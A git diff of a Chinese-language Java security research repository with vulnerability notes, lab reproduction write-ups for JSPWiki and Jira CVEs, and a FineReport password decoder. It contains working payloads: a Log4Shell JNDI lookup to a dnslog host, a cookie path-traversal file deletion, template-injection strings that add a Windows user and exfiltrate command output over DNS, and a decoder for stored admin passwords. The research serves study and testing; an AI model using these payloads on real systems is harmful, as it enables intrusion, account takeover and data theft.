diff --git a/README.md b/README.md index c990ca35..7107368b 100644 --- a/README.md +++ b/README.md @@ -1,45 +1,61 @@ > Focus on Java Security since November 1, 2021 👣 +--- + +JavaEE +``` +Servlet +JSP +JSF +Expression Language +Template Engine +JDBC +``` + +Application +``` +Apache +Atlassian +VMware +Weaver +Yonyou +Landray +``` + +Component +``` +Apache Commons JXPath +Apache Batik +UrlRewriteFilter +``` + +Framework +``` +Log +Microservice +RPC +Security +Web +``` + + +Middleware +``` +Jboss +Jetty +Resin +Tomcat +WebLogic +Wildfly +``` + +Mechanism +``` +Serialization +DataBinding +BeanValidation +``` + + -## TODO -— 任务驱动式学习路线 -- 实现xxx中间件的内存马 -- 分析xxx应用的历史漏洞 -- 阅读xxx工具的源码 -- 开发xxx功能的工具 -### 中间件 / 框架 -- [ ] Hessian -- [ ] Hibernate -- [ ] JBoss -- [ ] Jetty -- [ ] MyBatis -- [x] Resin - - [x] [内存马(filter/servlet)](https://github.com/pen4uin/JavaSec/blob/main/fileless-shell/resin/) - - [x] [漏洞分析](https://github.com/pen4uin/JavaSec/tree/main/vulnerability-analysis/resin) -- [ ] Shiro - - [x] 漏洞利用 修改key -- [ ] Struts2 -- [x] Spring - - [x] 内存马 (controller/interceptor) - - [ ] 漏洞分析 -- [ ] Tomcat - - [x] [内存马 (filter/servlet/listener/valve)](https://github.com/pen4uin/JavaSec/tree/main/fileless-shell/tomcat) -- [x] Weblogic - - [x] [内存马 (filter/listener/servlet)](https://github.com/pen4uin/JavaSec/blob/main/fileless-shell/weblogic/) - - [ ] 漏洞分析 -- [ ] WebSphere - -### 组件 / 库 / 类库 -- [ ] Fastjson -- [x] [Log4j2](https://github.com/pen4uin/JavaSec/tree/main/vulnerability-analysis/log4j2) -- [ ] XMLDecoder -- [ ] XStream -- [ ] SnakeYAML -- [ ] Jackson - -## 代码审计 -``` -希望能坚持更新到至少10+案例 👨‍💻 -``` -- [01 OFCMS](https://github.com/pen4uin/JavaSec/tree/main/code-audit/01_ofcms) diff --git a/application/apache/axis/README.md b/application/apache/axis/README.md new file mode 100644 index 00000000..8677f9e1 --- /dev/null +++ b/application/apache/axis/README.md @@ -0,0 +1,10 @@ +前置基础 +--- + + +相关漏洞 +--- + +- [01 Axis Rce分析](http://www.lmxspace.com/2019/07/20/Axis-Rce%E5%88%86%E6%9E%90/) +- [02 axis 1.4 AdminService未授权访问 jndi注入利用](https://xz.aliyun.com/t/7981) +- [03 攻击Axis服务的几种方式](https://www.x1a0t.com/2020/07/10/Attack-Axis-Service/) diff --git a/application/apache/cassandra/README.md b/application/apache/cassandra/README.md new file mode 100644 index 00000000..dca45cfc --- /dev/null +++ b/application/apache/cassandra/README.md @@ -0,0 +1,7 @@ +相关漏洞 +--- + +### CVE-2021-44521 RCE + +- https://y4er.com/post/cve-2021-44521-apache-cassandra-udf-rce/ + diff --git a/application/apache/druid/README.md b/application/apache/druid/README.md new file mode 100644 index 00000000..2900d9f8 --- /dev/null +++ b/application/apache/druid/README.md @@ -0,0 +1,35 @@ + + + +### Rce via Log4shell + +根据公开的payload + +![image-20211221141800963](vulnerability-research.assets/image-20211221141800963.png) + +定位source + +``` +sodu -rn "aaa.aaa.aaa" ~/Desktop/apache-druid-0.21.1/ +``` + +![image-20211221141728711](vulnerability-research.assets/image-20211221141728711.png) + + + +![image-20211221141932644](vulnerability-research.assets/image-20211221141932644.png) + +找到 + +- org.apache.druid.server.lookup.cache.LookupCoordinatorManager + +IDEA全局 + +![image-20211221142053238](vulnerability-research.assets/image-20211221142053238.png) + +最后成功定位到source + +- org.apache.druid.server.lookup.cache.LookupCoordinatorManager#deleteTier + +![image-20211216180541227](vulnerability-research.assets/image-20211216180541227.png) + diff --git a/application/apache/druid/vulnerability-research.assets/image-20211216180541227.png b/application/apache/druid/vulnerability-research.assets/image-20211216180541227.png new file mode 100644 index 00000000..5f0eed19 Binary files /dev/null and b/application/apache/druid/vulnerability-research.assets/image-20211216180541227.png differ diff --git a/application/apache/druid/vulnerability-research.assets/image-20211221141728711.png b/application/apache/druid/vulnerability-research.assets/image-20211221141728711.png new file mode 100644 index 00000000..cb902ab0 Binary files /dev/null and b/application/apache/druid/vulnerability-research.assets/image-20211221141728711.png differ diff --git a/application/apache/druid/vulnerability-research.assets/image-20211221141800963.png b/application/apache/druid/vulnerability-research.assets/image-20211221141800963.png new file mode 100644 index 00000000..1f9844f6 Binary files /dev/null and b/application/apache/druid/vulnerability-research.assets/image-20211221141800963.png differ diff --git a/application/apache/druid/vulnerability-research.assets/image-20211221141932644.png b/application/apache/druid/vulnerability-research.assets/image-20211221141932644.png new file mode 100644 index 00000000..7ca903aa Binary files /dev/null and b/application/apache/druid/vulnerability-research.assets/image-20211221141932644.png differ diff --git a/application/apache/druid/vulnerability-research.assets/image-20211221142053238.png b/application/apache/druid/vulnerability-research.assets/image-20211221142053238.png new file mode 100644 index 00000000..d5d1fa61 Binary files /dev/null and b/application/apache/druid/vulnerability-research.assets/image-20211221142053238.png differ diff --git a/application/apache/felix atomos/README.md b/application/apache/felix atomos/README.md new file mode 100644 index 00000000..4bd8a5fe --- /dev/null +++ b/application/apache/felix atomos/README.md @@ -0,0 +1,6 @@ +相关漏洞 +--- + +### GHSL-2022-007 Path Traversal + +- https://securitylab.github.com/advisories/GHSL-2022-007_Apache_Felix_Atomos/ diff --git a/application/apache/james server/README.md b/application/apache/james server/README.md new file mode 100644 index 00000000..634980eb --- /dev/null +++ b/application/apache/james server/README.md @@ -0,0 +1,6 @@ +相关漏洞 +--- + +### CVE-2022-22931 Path Traversal + +- https://securitylab.github.com/advisories/GHSL-2022-002_GHSL-2022-003_Apache_James_Server/ diff --git a/application/apache/jspwiki/README.md b/application/apache/jspwiki/README.md new file mode 100644 index 00000000..60e9de1a --- /dev/null +++ b/application/apache/jspwiki/README.md @@ -0,0 +1,223 @@ +## 相关漏洞 +### CVE-2021-44228 Log4shell + +#### 漏洞描述 + +影响范围(已确认):v2.11.0 + +![image-20220110151507777](jspwiki.assets/image-20220110151507777.png) + + + +#### 漏洞复现 + +##### 环境搭建 + +查看仓库存在哪些版本的镜像 + +```shell +curl https://registry.hub.docker.com/v1/repositories/jspwiki/tags| tr -d '[\[\]" ]' | tr '}' '\n'| awk -F: -v image='jspwiki' '{if(NR!=NF && 3ドル != ""){printf("%s:%s\n",image,3ドル)}}' +``` + +![image-20220110150226665](jspwiki.assets/image-20220110150226665.png) + +有存在log4shell版本(v2.11.0)的镜像,拉取 + +```shell +sudo docker pull apache/jspwiki:release-2.11.0 + +# 或者 +docker pull vultarget/jspwiki_log4j_rce:2.11.0 +``` + +查看本地已经pull的镜像 + +``` +sudo docker images +``` + +![image-20220110171735060](jspwiki.assets/image-20220110171735060.png) + +启动 + +```shell +# 提前将调试端口映射出来 +sudo docker run -d -p 8080:8080 -p 5005:5005 --name jspwiki_log4shell_debug vultarget/jspwiki_log4j_rce:2.11.0 +``` + +应用首页 + +![image-20220110172151844](jspwiki.assets/image-20220110172151844.png) + + + +##### 漏洞验证 + +**proof of concept** + +``` +curl -vv http://10.10.10.139:8080/wiki/$%7Bjndi:ldap:$%7B::-/%7D/9p1lvv.dnslog.cn%7D/ +``` + +![image-20220110172050167](jspwiki.assets/image-20220110172050167.png) + + + +### CVE-2021-44140 Pre-auth 文件删除 + +#### 漏洞描述 + +https://jspwiki-wiki.apache.org/Wiki.jsp?page=CVE-2021-44140 + +影响范围:Apache JSPWiki up to 2.11.0.M8 + +#### 漏洞复现 + +##### 环境搭建 + +###### 基于docker + +搜索镜像 + +``` +sudo docker search jspwiki +``` + +![image-20220110142929486](jspwiki.assets/image-20220110142929486.png) + +``` +sudo docker pull vulfocus/jspwiki-cve_2021_44140 +docker run -d -p 8080:8080 --name jspwiki vulfocus/jspwiki-cve_2021_44140 +``` + +![image-20220110143652926](jspwiki.assets/image-20220110143652926.png) + +如图,成功搭建 + +![image-20220110143822970](jspwiki.assets/image-20220110143822970.png) + +``` +# 二次启动时,使用container id 即可 +sudo dokcer ps -a +sudo docker start a50359cfb0d1 + +# 进入container 内部 +sudo docker exec -it a50359cfb0d1 /bin/sh +``` + +![image-20220110153629595](jspwiki.assets/image-20220110153629595.png) + +配置远程调试,在/bin/catalina.sh中添加如下代码: + +``` +CATALINA_OPTS="-Xdebug -Xrunjdwp:transport=dt_socket,address=5005,suspend=n,server=y" +``` + +- address=5005: 5005为远程debug时监听的端口 + +![image-20220110154139526](jspwiki.assets/image-20220110154139526.png) + +退出,将调试端口也映射出来 + +- 为运行的container增加端口 + - https://stackoverflow.com/questions/19335444/how-do-i-assign-a-port-mapping-to-an-existing-docker-container + +``` +docker commit jspwiki jspwiki_debug +sudo docker run -p 8080:8080 -p 5005:5005 -td jspwiki_debug +``` + +本地idea测试 + +![image-20220110155734110](jspwiki.assets/image-20220110155734110.png) + +`Connected` 表示成功 + +![image-20220110155805314](jspwiki.assets/image-20220110155805314.png) + + + + + +##### 漏洞验证 + +**proof of concept** + +现在/tmp/目录下创建flag.txt + +![image-20220110161543541](jspwiki.assets/image-20220110161543541.png) + + + +```shell +Get /Logout.jsp +... +... +Cookie: JSESSIONID=xxx; JSPWikiAssertedName=xxx; JSPWikiUserPrefs=xxx;JSPWikiUID=../../../../../../../../../../../../../../../tmp/flag.txt +``` + +![image-20220110161704602](jspwiki.assets/image-20220110161704602.png) + +成功删除flag.txt + +![image-20220110161955992](jspwiki.assets/image-20220110161955992.png) + +#### 漏洞分析 + +根据漏洞名称。可以猜出漏洞点在注销处。 + +测试版本:2.11.0.M7 + +跟进 + +- logout.jsp + + 调用CookieAuthenticationLoginModule.clearLoginCookie() 删除cookie + + ![image-20220110131939248](jspwiki.assets/image-20220110131939248.png) + +- org.apache.wiki.auth.login.CookieAuthenticationLoginModule#clearLoginCookie + + ![image-20220110132101561](jspwiki.assets/image-20220110132101561.png) + +- org.apache.wiki.auth.login.CookieAuthenticationLoginModule#getLoginCookie(javax.servlet.http.HttpServletRequest) + + 存在可控参数JSPWikiUID + + ![image-20220110133028087](jspwiki.assets/image-20220110133028087.png) + + 若满足条件,则调用getCookieFile(),返回值赋值给uid + + ``` + String uid = getLoginCookie(request); + ``` + +- org.apache.wiki.auth.login.CookieAuthenticationLoginModule#getCookieFile + + ![image-20220110132647092](jspwiki.assets/image-20220110132647092.png) + + 创建cookieDir + + ``` + # 拼接后作为路径 + File cookieDir = new File(engine.getWorkDir(), "logincookies"); + ``` + + 若该路径不存在,则创建,执行流程走到第2个else分支 + + ``` + File file = new File(cookieDir, uid); + ``` + + 根据cookdir 和 uid 创建文件,返回值赋值给cf 。 + + 若满足条件 + + ``` + cf != null && !cf.delete() + ``` + + 则将文件cf进行删除处理 + + ![image-20220110132939245](jspwiki.assets/image-20220110132939245.png) + diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110115454715.png b/application/apache/jspwiki/jspwiki.assets/image-20220110115454715.png new file mode 100644 index 00000000..be0821f1 Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110115454715.png differ diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110122150681.png b/application/apache/jspwiki/jspwiki.assets/image-20220110122150681.png new file mode 100644 index 00000000..7838f610 Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110122150681.png differ diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110131939248.png b/application/apache/jspwiki/jspwiki.assets/image-20220110131939248.png new file mode 100644 index 00000000..b2457fc0 Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110131939248.png differ diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110132101561.png b/application/apache/jspwiki/jspwiki.assets/image-20220110132101561.png new file mode 100644 index 00000000..244d6556 Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110132101561.png differ diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110132402813.png b/application/apache/jspwiki/jspwiki.assets/image-20220110132402813.png new file mode 100644 index 00000000..424e852a Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110132402813.png differ diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110132647092.png b/application/apache/jspwiki/jspwiki.assets/image-20220110132647092.png new file mode 100644 index 00000000..07bbb85d Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110132647092.png differ diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110132939245.png b/application/apache/jspwiki/jspwiki.assets/image-20220110132939245.png new file mode 100644 index 00000000..bf6e6846 Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110132939245.png differ diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110133028087.png b/application/apache/jspwiki/jspwiki.assets/image-20220110133028087.png new file mode 100644 index 00000000..7fa3443c Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110133028087.png differ diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110142929486.png b/application/apache/jspwiki/jspwiki.assets/image-20220110142929486.png new file mode 100644 index 00000000..9b7860ad Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110142929486.png differ diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110143652926.png b/application/apache/jspwiki/jspwiki.assets/image-20220110143652926.png new file mode 100644 index 00000000..0f7623b9 Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110143652926.png differ diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110143822970.png b/application/apache/jspwiki/jspwiki.assets/image-20220110143822970.png new file mode 100644 index 00000000..cb1af8ba Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110143822970.png differ diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110150226665.png b/application/apache/jspwiki/jspwiki.assets/image-20220110150226665.png new file mode 100644 index 00000000..3a4dfdcc Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110150226665.png differ diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110151507777.png b/application/apache/jspwiki/jspwiki.assets/image-20220110151507777.png new file mode 100644 index 00000000..efdebabd Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110151507777.png differ diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110151828365.png b/application/apache/jspwiki/jspwiki.assets/image-20220110151828365.png new file mode 100644 index 00000000..fa203056 Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110151828365.png differ diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110153629595.png b/application/apache/jspwiki/jspwiki.assets/image-20220110153629595.png new file mode 100644 index 00000000..8d65e60c Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110153629595.png differ diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110154139526.png b/application/apache/jspwiki/jspwiki.assets/image-20220110154139526.png new file mode 100644 index 00000000..e10019ef Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110154139526.png differ diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110155144536.png b/application/apache/jspwiki/jspwiki.assets/image-20220110155144536.png new file mode 100644 index 00000000..112e73a1 Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110155144536.png differ diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110155734110.png b/application/apache/jspwiki/jspwiki.assets/image-20220110155734110.png new file mode 100644 index 00000000..f84b9649 Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110155734110.png differ diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110155805314.png b/application/apache/jspwiki/jspwiki.assets/image-20220110155805314.png new file mode 100644 index 00000000..17e9d300 Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110155805314.png differ diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110161543541.png b/application/apache/jspwiki/jspwiki.assets/image-20220110161543541.png new file mode 100644 index 00000000..7dc53ff8 Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110161543541.png differ diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110161704602.png b/application/apache/jspwiki/jspwiki.assets/image-20220110161704602.png new file mode 100644 index 00000000..c5cf3ae3 Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110161704602.png differ diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110161955992.png b/application/apache/jspwiki/jspwiki.assets/image-20220110161955992.png new file mode 100644 index 00000000..0fc5ddbc Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110161955992.png differ diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110171302346.png b/application/apache/jspwiki/jspwiki.assets/image-20220110171302346.png new file mode 100644 index 00000000..16107b3b Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110171302346.png differ diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110171735060.png b/application/apache/jspwiki/jspwiki.assets/image-20220110171735060.png new file mode 100644 index 00000000..4f6d52fa Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110171735060.png differ diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110172050167.png b/application/apache/jspwiki/jspwiki.assets/image-20220110172050167.png new file mode 100644 index 00000000..61b5c28d Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110172050167.png differ diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110172151844.png b/application/apache/jspwiki/jspwiki.assets/image-20220110172151844.png new file mode 100644 index 00000000..96576a59 Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110172151844.png differ diff --git a/application/apache/karaf/README.md b/application/apache/karaf/README.md new file mode 100644 index 00000000..f8bc1e03 --- /dev/null +++ b/application/apache/karaf/README.md @@ -0,0 +1,6 @@ +相关漏洞 +--- + +### CVE-2022-22932 Path Traversal + +- https://securitylab.github.com/advisories/GHSL-2022-005_006_Apache_Karaf/ diff --git a/application/apache/kylin/README.md b/application/apache/kylin/README.md new file mode 100644 index 00000000..71991fdd --- /dev/null +++ b/application/apache/kylin/README.md @@ -0,0 +1,10 @@ +相关漏洞 +--- + +### CVE-2021-45456 Command injection + +- https://securitylab.github.com/advisories/GHSL-2021-1048_GHSL-2021-1051_Apache_Kylin/ + +### CVE-2021-45458 Hardcoded credentials + +- https://securitylab.github.com/advisories/GHSL-2021-1048_GHSL-2021-1051_Apache_Kylin/ diff --git a/application/apache/olingo/README.md b/application/apache/olingo/README.md new file mode 100644 index 00000000..d4a53b9a --- /dev/null +++ b/application/apache/olingo/README.md @@ -0,0 +1,17 @@ +相关漏洞 +--- + +### CVE-2020-1925 SSRF + +- https://blog.gypsyengineer.com/en/security/cve-2020-1925-ssrf-in-apache-olingo.html + +### CVE-2019-17556 Unsafe deserialization + +- https://blog.gypsyengineer.com/en/security/cve-2019-17556-unsafe-deserialization-in-apache-olingo.html + + +### CVE-2019-17555 DoS + +- https://blog.gypsyengineer.com/en/security/cve-2019-17555-dos-via-retry-after-header-in-apache-olingo.html + + diff --git a/application/apache/pinot/README.md b/application/apache/pinot/README.md new file mode 100644 index 00000000..7f90bb5a --- /dev/null +++ b/application/apache/pinot/README.md @@ -0,0 +1,6 @@ +相关漏洞 +--- + +### GHSL-2022-004 Path Traversal + +- https://securitylab.github.com/advisories/GHSL-2022-004_Apache_Pinot/ diff --git a/application/apache/poi/README.md b/application/apache/poi/README.md new file mode 100644 index 00000000..2916506a --- /dev/null +++ b/application/apache/poi/README.md @@ -0,0 +1,6 @@ +相关漏洞 +--- + +### CVE-2019-12415 XXE + +- https://blog.gypsyengineer.com/en/security/cve-2019-12415-xml-processing-vulnerability-in-apache-poi.html diff --git a/application/apache/solr/README.md b/application/apache/solr/README.md new file mode 100644 index 00000000..75ae8171 --- /dev/null +++ b/application/apache/solr/README.md @@ -0,0 +1,11 @@ +前置基础 +--- + +相关漏洞 +--- + + +研究利用 +--- + +https://github.com/veracode-research/solr-injection diff --git a/application/apache/storm/README.md b/application/apache/storm/README.md new file mode 100644 index 00000000..59feaf3a --- /dev/null +++ b/application/apache/storm/README.md @@ -0,0 +1,10 @@ +相关漏洞 +--- + +### CVE-2021-40865 Unsafe Deserialization + +- https://securitylab.github.com/advisories/GHSL-2021-086-apache-storm/ + +### CVE-2021-38294 Command injection + +- https://securitylab.github.com/advisories/GHSL-2021-085-apache-storm/ diff --git a/application/atlassian/bitbucket/README.md b/application/atlassian/bitbucket/README.md new file mode 100644 index 00000000..5855e2b0 --- /dev/null +++ b/application/atlassian/bitbucket/README.md @@ -0,0 +1,5 @@ +相关漏洞 + +- [ ] CVE-2019-3397 Path Travel -> RCE + + diff --git a/application/atlassian/confluence/README.md b/application/atlassian/confluence/README.md new file mode 100644 index 00000000..34f87426 --- /dev/null +++ b/application/atlassian/confluence/README.md @@ -0,0 +1,6 @@ +相关漏洞 + +- [x] [CVE-2022-26134 OGNL -> RCE](https://pen4uin.github.io/post/22-10-03-confluence-el-injection-via-ognl/) +- [ ] CVE-2021-26084 OGNL -> RCE +- [ ] CVE-2019-3396 Velocity SSTi=I -> RCE/File Read +- [x] [CVE-2020-4027 SSTI -> RCE](https://pen4uin.github.io/post/22-10-01-confluence-ssti-via-velocity/) \ No newline at end of file diff --git a/application/atlassian/crowd/README.md b/application/atlassian/crowd/README.md new file mode 100644 index 00000000..269cd393 --- /dev/null +++ b/application/atlassian/crowd/README.md @@ -0,0 +1,3 @@ +相关漏洞 + +- [ ] CVE-2019-11580 RCE \ No newline at end of file diff --git a/application/atlassian/jira/CVE-2019-11581.md b/application/atlassian/jira/CVE-2019-11581.md new file mode 100644 index 00000000..f724d75f --- /dev/null +++ b/application/atlassian/jira/CVE-2019-11581.md @@ -0,0 +1,60 @@ +#### 漏洞描述 + +影响版本 +``` +4.4.x +5.x.x +6.x.x +7.0.x、7.1.x、7.2.x、7.3.x、7.4.x、7.5.x、7.6.x before 7.6.14 (the fixed version for 7.6.x)、7.7.x、7.8.x、7.9.x、7.10.x、7.11.x、7.12.x、7.13.x before 7.13.5 (the fixed version for 7.13.x) +8.0.x before 8.0.3 (the fixed version for 8.0.x)、8.1.x before 8.1.2 (the fixed version for 8.1.x)、8.2.x before 8.2.3 (the fixed version for 8.2.x) +``` + +### 漏洞复现 + +#### 漏洞验证 + +漏洞利用 + +> https://github.com/jas502n/CVE-2019-11581 + +确认未登陆状态下漏洞的存在 + +访问如下URL(无需管理员账户权限): + +http://10.10.10.12:8080/secure/ContactAdministrators!default.jspa + +![image-20210919113350954](img/image-20210919113350954-16322839765956.png) + +在Subject填入payload + +针对不同目标操作系统的验证 + +- Windows +- Linux + +##### Windows 利用 + +添加用户 + +``` +$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('net user neo 1qaz@WSX3edc /add').waitFor() +``` + +##### Linux 利用 + +登陆管理员账号,然后访问如下URL: + +/secure/admin/SendBulkMail!default.jspa + +``` +# dnslog query +$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('curl http://uz09sm.dnslog.cn').waitFor() + +# dnslog 外带命令执行结果 示例:whoami +$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('ping `whoami`.vniyj2.dnslog.cn').waitFor() +``` + +dnslog query + +![image-20210919120024420](img/image-20210919120024420.png) + diff --git a/application/atlassian/jira/README.md b/application/atlassian/jira/README.md new file mode 100644 index 00000000..8399a250 --- /dev/null +++ b/application/atlassian/jira/README.md @@ -0,0 +1,2 @@ +相关漏洞 +- [x] [CVE-2019-11581 SSTI -> RCE](CVE-2019-11581.md) \ No newline at end of file diff --git a/application/atlassian/jira/img/image-20210919113350954-16322839765956.png b/application/atlassian/jira/img/image-20210919113350954-16322839765956.png new file mode 100644 index 00000000..58b8b123 Binary files /dev/null and b/application/atlassian/jira/img/image-20210919113350954-16322839765956.png differ diff --git a/application/atlassian/jira/img/image-20210919120024420.png b/application/atlassian/jira/img/image-20210919120024420.png new file mode 100644 index 00000000..b45fe4ab Binary files /dev/null and b/application/atlassian/jira/img/image-20210919120024420.png differ diff --git a/application/cisco/asdm/README.md b/application/cisco/asdm/README.md new file mode 100644 index 00000000..1ece7360 --- /dev/null +++ b/application/cisco/asdm/README.md @@ -0,0 +1,4 @@ +相关漏洞 + +- [ ] CVE-2021-1585 RCE + diff --git a/application/cisco/hyperflex hx/README.md b/application/cisco/hyperflex hx/README.md new file mode 100644 index 00000000..dae85a3d --- /dev/null +++ b/application/cisco/hyperflex hx/README.md @@ -0,0 +1,8 @@ +相关漏洞 + +- [ ] CVE-2021-1497 Command Injection +- [ ] CVE-2021-1498 Command Injection +- [ ] CVE-2021-1499 File Upload + + + diff --git a/application/citrix/xenmobile/README.md b/application/citrix/xenmobile/README.md new file mode 100644 index 00000000..1fe2d113 --- /dev/null +++ b/application/citrix/xenmobile/README.md @@ -0,0 +1,4 @@ +相关漏洞 + +- [ ] CVE-2021-44228 Path Traversal +- [x] [CVE-2020-8209 Path Traversal](https://mp.weixin.qq.com/s/tZXp1zTlfas7makYcgZusw) \ No newline at end of file diff --git a/application/f5/README.md b/application/f5/README.md new file mode 100644 index 00000000..970c22a5 --- /dev/null +++ b/application/f5/README.md @@ -0,0 +1,4 @@ +相关漏洞 + +- [ ] CVE-2020-5902 RCE + diff --git a/application/fanruan/README.md b/application/fanruan/README.md new file mode 100644 index 00000000..fd335139 --- /dev/null +++ b/application/fanruan/README.md @@ -0,0 +1,3 @@ +历史漏洞 + +- [ ] CNVD-2021-34467 v9 文件上传 \ No newline at end of file diff --git a/application/fanruan/code/X-FineReport.jar b/application/fanruan/code/X-FineReport.jar new file mode 100644 index 00000000..22b8f795 Binary files /dev/null and b/application/fanruan/code/X-FineReport.jar differ diff --git a/application/fanruan/code/X-FineReport.java b/application/fanruan/code/X-FineReport.java new file mode 100644 index 00000000..68c89bc0 --- /dev/null +++ b/application/fanruan/code/X-FineReport.java @@ -0,0 +1,57 @@ +package code; + +public class FineReport { + private static final int[] PASSWORD_MASK_ARRAY = new int[]{19, 78, 10, 15, 100, 213, 43, 23}; + public static String passwordEncode(String paramString) { + final StringBuilder sb = new StringBuilder(); + sb.append("___"); + int n = 0; + for (int i = 0; i < paramString.length(); ++i) { + if (n == PASSWORD_MASK_ARRAY.length) { + n = 0; + } + String s2 = Integer.toHexString(paramString.charAt(i) ^ PASSWORD_MASK_ARRAY[n]); + for (int length = s2.length(), j = 0; j < 4 - length; ++j) { + s2 = "0" + s2; + } + sb.append(s2); + ++n; + } + return sb.toString(); + } + + private static String passwordDecode(String paramString) { + if (paramString != null && paramString.startsWith("___")) { + paramString = paramString.substring(3); + StringBuilder sb = new StringBuilder(); + int i = 0; + for (int j = 0; j <= paramString.length() - 4; j += 4) { + if (i == PASSWORD_MASK_ARRAY.length) { + i = 0; + } + String str = paramString.substring(j, j + 4); + int k = Integer.parseInt(str, 16) ^ PASSWORD_MASK_ARRAY[i]; + sb.append((char) k); + ++i; + } + paramString = sb.toString(); + } + return paramString; + } + + public static void main(String[] args) { + if (args.length < 2) { + System.out.println("Usage:"); + System.out.println("FineReportX.jar --encode admin"); + System.out.println("FineReportX.jar --decode ___0072002a00670066000a00e400190024"); + } else { + if ("--encode".equals(args[0])) { + String pass = passwordEncode(args[1]); + System.out.println(pass); + } else if ("--decode".equals(args[0])) { + String pass = passwordDecode(args[1]); + System.out.println(pass); + } + } + } +} diff --git a/application/fanruan/code/fineReport-decrypt.py b/application/fanruan/code/fineReport-decrypt.py new file mode 100644 index 00000000..d18e6633 --- /dev/null +++ b/application/fanruan/code/fineReport-decrypt.py @@ -0,0 +1,9 @@ +cipher = input("输入密文:\n") # 密文 +PASSWORD_MASK_ARRAY = [19, 78, 10, 15, 100, 213, 43, 23] +password = "" +cipher = cipher[3:] +for i in range(int(len(cipher) / 4)): + c1 = int("0x" + cipher[i * 4:(i + 1) * 4], 16) + c2 = c1 ^ PASSWORD_MASK_ARRAY[i % 8] + password = password + chr(c2) +print("明文密码:\n"+password) diff --git "a/application/fanruan/345円210円251円347円224円250円347円240円224円347円251円266円.md" "b/application/fanruan/345円210円251円347円224円250円347円240円224円347円251円266円.md" new file mode 100644 index 00000000..aa056d6b --- /dev/null +++ "b/application/fanruan/345円210円251円347円224円250円347円240円224円347円251円266円.md" @@ -0,0 +1,32 @@ + +### 密码解密 + +> python + +密码配置文件 +``` +\WEB-INF\resources\privilege.xml +``` +获取加密后的密文 + +![image](https://user-images.githubusercontent.com/55024146/129508186-d55dace1-7218-4dd9-9848-b33c842e1005.png) + +反编译jar包获取加密代码逻辑 + +![image](https://user-images.githubusercontent.com/55024146/129508634-ee7e2498-e31f-49d9-a77c-e14a60794b9c.png) + + +解密脚本 +![image](https://user-images.githubusercontent.com/55024146/159114641-26d5a937-b5e7-4f0d-bb44-cf5864279c05.png) + + +> java + +- 获取加解密逻辑姿势同上 + +```shell +java -jar .\X-code.FineReport.jar --encode pen4uin +java -jar .\X-code.FineReport.jar --decode ___0063002b0064003b001100bc0045 +``` + +![image](https://user-images.githubusercontent.com/55024146/159114652-70a84da5-327a-4b2d-8077-bb18aef87a2c.png) diff --git "a/application/h3c/345円210円251円347円224円250円347円240円224円347円251円266円.md" "b/application/h3c/345円210円251円347円224円250円347円240円224円347円251円266円.md" new file mode 100644 index 00000000..acfef1eb --- /dev/null +++ "b/application/h3c/345円210円251円347円224円250円347円240円224円347円251円266円.md" @@ -0,0 +1,4 @@ +利用研究 +--- + +- [IMC数据库解密 from t00ls](https://www.t00ls.com/articles-66252.html) diff --git a/application/ibm/README.md b/application/ibm/README.md new file mode 100644 index 00000000..caaf7345 --- /dev/null +++ b/application/ibm/README.md @@ -0,0 +1,5 @@ +历史漏洞 + 